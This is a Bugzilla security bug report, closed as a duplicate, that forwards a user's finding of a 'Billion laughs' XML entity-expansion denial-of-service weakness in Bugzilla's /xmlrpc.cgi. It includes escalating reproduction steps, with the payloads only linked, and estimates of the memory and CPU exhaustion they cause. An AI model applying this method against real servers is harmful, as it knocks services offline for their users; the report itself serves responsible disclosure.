Closed Bug 1151719 Opened 9 years ago Closed 9 years ago

XML Bombing vulnerability in /xmlrpc.cgi

Categories

(Bugzilla :: WebService, defect)

Product:
Bugzilla
Component:
WebService
Platform:
x86_64
Linux
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1031035

People

(Reporter: jmcdonal, Unassigned)

Details

I am the development team lead for Red Hat Bugzilla

An external user of Red Hat Bugzilla reported this issue.  I am re-reporting it here because (a) I do not have visibility of security issues in BMO, so I am unable to confirm whether the upstream Bugzilla developers are already aware of the issue, and (b) I would prefer that the issue is fixed upstream rather than only in Red Hat Bugzilla.

The original report, from https://bugzilla.redhat.com/show_bug.cgi?id=1209111 (currently access restricted to a small subset of Red Hat staff) is reproduced below.  I have omitted the original reporter's identity at this time as I do not have their explicit permission to identify them, though I am seeking that permission.

An additional concern I have is that the screenshots shown in the original bug report are public and show both Red Hat Bugzilla's hostname and the contents of the troublesome request (though http://en.wikipedia.org/wiki/Billion_laughs indicates that the content has been well-known for some years).  I have asked the original reporter to take those screenshots down and attach them directly to the bug report instead.


Original Description of problem:

XML Bombing / XML DoS / "Billion laughs attacks" is a well known vulnerability that can be found in a XML parser that accepts DTDs and entities. 
As a reference, you can visit https://msdn.microsoft.com/en-us/magazine/ee335713.aspx 

Version-Release number of selected component (if applicable):
The current version of Bugzilla that is installed at bugzilla.redhat.com . 

How reproducible: Easy to reproduce.

Steps to Reproduce:
1. Make the request visible at http://s23.postimg.org/sz3d6ipp7/lol6.png and notice how the response arrives almost instantly. 
2. Make the request visible at http://s7.postimg.org/baj2hzq6j/lol7.png and notice how the response takes a little longer to arrive. 
3. Make the request visible at http://s9.postimg.org/w0owxesrz/lol8.png and notice how the response takes about 10 times longer to arrive. 
4. Make the request visible at http://s17.postimg.org/za11eiyyn/lol9.png and notice how the response gives a timeout after a long period of time.
5. Make a few requests described above and enjoy how the server uses all it's computational power and RAM to parse a few XMLs.
See the attachment for the request in plain text.

Actual results:
Possible DoS.

Expected results:
The parser should the usage of entities.

Additional info:
A request similar with the one described at point 5 might use up to 3GB of RAM and a great deal of CPU. With a relative small number of requests, we can implement a DoS attack against the server that hosts Bugzilla software.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Bug 1031035 is already public, so no need to keep this one private.
Group: bugzilla-security
You need to log in before you can comment on or make changes to this bug.